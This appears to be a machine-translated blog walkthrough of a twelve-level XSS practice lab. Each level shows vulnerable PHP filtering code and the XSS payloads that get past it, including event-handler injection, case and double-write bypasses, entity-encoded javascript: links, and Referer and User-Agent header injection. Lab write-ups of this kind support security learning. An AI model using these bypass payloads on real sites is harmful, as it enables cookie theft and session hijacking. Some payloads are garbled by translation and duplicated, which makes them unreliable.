Code audit learning XSS

definition

Cross site scripting attack is not confused with css, so cross site scripting attack is abbreviated as XSS. XSS is a security vulnerability of Web application, which is mainly caused by insufficient filtering of user input by Web application. The malicious attacker inserts the malicious script code into the Web page. When the user browses the page, the malicious script code embedded in the Web can take various attacks against the victim, such as Cookie data theft, session hijacking, phishing and deception

Less-1

<?php 

ini_set("display_errors", 0);

$str = $_GET["name"];

echo "<h2 align=center>Welcome users".$str."</h2>";

?>

You can see that the value of $str in the source code is in the form of get, but the name in get is not filtered later, resulting in xss injection

Inject with basic XSS

Less-2

Here we need to bypass and close the front "to make value become value =" "

Analyze source code

<?php 

ini_set("display_errors", 0);

$str = $_GET["keyword"];

echo "<h2 align=center>No and".htmlspecialchars($str)."Relevant results.</h2>".'<center>

<form action=level2.php method=GET>

<input name=keyword  value="'.$str.'">

<input type=submit name=submit value="search"/>

</form>

</center>';

?>

The source code here can also see that it is a get request, but it uses a filter in this way

.htmlspecialchars($str)

This fi lt er can convert predefined values into HTML entities, but < is not available

Here we can also use JavaScript events to pop up

" onclick=alert(1)This requires one click on the input box<br>
For the back here//Comments can also be made through

less-3

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>No and".htmlspecialchars($str)."Relevant results.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword  value='".htmlspecialchars($str)."'>
<input type=submit name=submit value=search />
</form>
</center>";
?>

There is not much difference between here and the above, but the escape of value output here makes the keyword unable to receive < >

So we need to use JavaScript events

'onclick=alert(1)//

Here we use single quotation marks to close

less-4

Direct analysis code

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "<h2 align=center>No and".htmlspecialchars($str)."Relevant results.</h2>".'<center>
<form action=level4.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value=search />
</form>
</center>';
?>

A new function is written here

str_replace(">","",$str)
This means to>Change to empty on the, add.htmlspecialchars($str)such<script>It won't work

In this way, we can only use the trigger event of the window to pop up, so we still use it

"onclick=alert(1)//

less-5

Analysis code

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
echo "<h2 align=center>No and".htmlspecialchars($str)."Relevant results.</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value=search />
</form>
</center>';
?>

There is nothing changed here, but the last two functions are used for filtering

$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);

Therefore, the trigger event of JavaScript cannot be used, and only pseudo links can be used

Here's another function. Case sensitive

$str = strtolower($_GET["keyword"]);

As before, close the value value, otherwise htmlspecialchar will fi lt er<

Written by payload

"><a href=JavaScript:alert(1)>nihao</a>

In this way, we can click nihao to jump

<iframe src="URL">

It can be realized with this label

less-6

Analysis code

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>No and".htmlspecialchars($str)."Relevant results.</h2>".'<center>
<form action=level6.php method=GET>
<input name=keyword  value="'.$str6.'">
<input type=submit name=submit value=search />
</form>
</center>';
?>

Here we can see that it is basically the same as the above filter, but there is a case filter missing, so we need to add uppercase, so we can bypass it

There are many ways to write our payload here

"> <Script>alert(1)</script> 

"> <img Src=x OnError=alert(1)> 

"><a HrEf="javascript:alert(1)">bmjoker</a>

"><svg x=" " Onclick=alert(1)>

"><ScriPt>alert(1)<sCrIpt>"

" OncliCk=alert(1)

less-7

Look at the code

<?php 
　　ini_set("display_errors", 0);
　　$str =strtolower( $_GET["keyword"]);
　　$str2=str_replace("script","",$str);
　　$str3=str_replace("on","",$str2);
　　$str4=str_replace("src","",$str3);
　　$str5=str_replace("data","",$str4);
　　$str6=str_replace("href","",$str5);
　　echo "<h2 align=center>No and".htmlspecialchars($str)."Relevant results.</h2>".'<center>
　　<form action=level7.php method=GET>
　　　　<input name=keyword  value="'.$str6.'">
　　　　<input type=submit name=submit value=search />
　　　　</form>
　　</center>';
?>

Here we look at the code and see that there are many blacklists, which are empty, case and < escape, but we find that we do not disable bidirectional functions

So we use double write bypass

payload is as follows

"<scrscriptipt>alert(1)</scrscriptipt>

" oonnmouseover=alert(1)

"><a hrhrefef=javascriscriptpt:alert(1)>bmjoker</a>

" oonnclick=alert(1)//

less-8

Look at the code

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level8.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=Add links />
</form>
</center>';
?>
<?php
echo '<center><BR><a href="'.$str7.'">Links</a></center>';
?>

Analyze the code and convert < script to < SCR_ IPT, on to o_n. Convert src to sr_c. Convert data to da_ta, href to hr_ef，

The case is also invalid. "It is also encoded, but the angle brackets < >, single quotation marks',%, #, & symbols are not filtered. The output point is in the a tag and the href attribute,

The double quotation marks in the attribute are converted into HTML entities, and the attribute cannot be truncated. We can use the protocol to bypass javascript:alert. Because the script keyword is filtered,

javascript will be replaced with javascript C_ RPT, we use &#x72 to replace R, HTML character entity conversion: https://www.qqxiuzi.cn/bianma/zifushiti.php

payload:

javascrip&#x74;:alert(1)

javascript:%61lert(1)

javasc&#x72;ipt:alert`1`

javasc&#x0072;ipt:alert`1`

If the requested url parameter contains% 0d% 0a,% 0d% 0a will be escaped as carriage return and line feed when the string containing this field is obtained in the servlet

less-9

Analysis code

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=Add links />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))
{
  echo '<center><BR><a href="Your link is illegal? Is there any!">Links</a></center>';
        }
else
{
  echo '<center><BR><a href="'.$str7.'">Links</a></center>';
}
?>

Most of them have no problem, but an http: / / check is added here

false===strpos($str7,'http://'))

This can check whether the url is in the form of http: / / or not

So our payload can be written as

javascrip&#x74;:alert(1)//http://xxx.com //Use notes

javascrip&#x74;:% 0 dhttp://xxx.com%0dalert (1) / / do not use comments

javascrip&#x74;:% 0 ahttp://xxx.com%0dalert (1) / / do not use comments

less-10

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>No and".htmlspecialchars($str)."Relevant results.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

After analyzing the code, it is found that two parameters are required, one is keyword and the other is t_sort, angle brackets < > are converted to empty, and there are three hidden input boxes

<input name="t_sort"  value="'.$str33.'" type="hidden">
We need to build through this sentence payload
keyword = test&t_sort="type="text" onclick = "alert(1)
So we can build
<input name="t_sort" value=" " type="text" onclick = "alert(1)" type="hidden">

And two payload s

keyword = test&t_sort="type="text" οnmοuseοver="alert(1)

keyword = test&t_sort="type="text" onmouseover=alert`1`

This is based on JavaScript events

less-11

code

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>No and".htmlspecialchars($str)."Relevant results.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

What's different here is that one is added here

s t r 11 = str11= str11=_SERVER['HTTP_REFERER'];

Because of this, we need to capture the web page and send the referer request package to the server

So we need to add payload as

Referer: " onmouseover=alert(1) type="text"There's no need to close here alert

Referer: " onclick="alert(1) type="text"This needs to be closed alert

You just need to add payload to the sending request packet

less-12

The payload used in this level is

User-Agent: " οnmοuseοver=alert(1) type="text"

onclick doesn't seem to work here

https://www.cnblogs.com/bmjoker/p/9446472.html

Refer to

What's different here is that one is added here

$str11=$_SERVER['HTTP_REFERER'];

Because of this, we need to capture the web page and send it to the server referer Request package for

So we need to add payload by

Referer: " ο nm ο use ο ver=alert(1) type="text" there is no need to close alert here

Referer: " ο nclick="alert(1) type="text "you need to close alert here

Just add payload No problem

# less-12

It's for this level payload yes

```php
User-Agent: " onmouseover=alert(1) type="text"

onclick doesn't seem to work here

Keywords: security Web Security xss

Added by whizzykid on Sat, 05 Feb 2022 04:12:52 +0200

Programming VIP

Code audit learning XSS

definition

Less-1

Less-2

less-3

less-4

less-5

less-6

less-7

less-8

less-9

less-10

less-11

less-12

Popular Keywords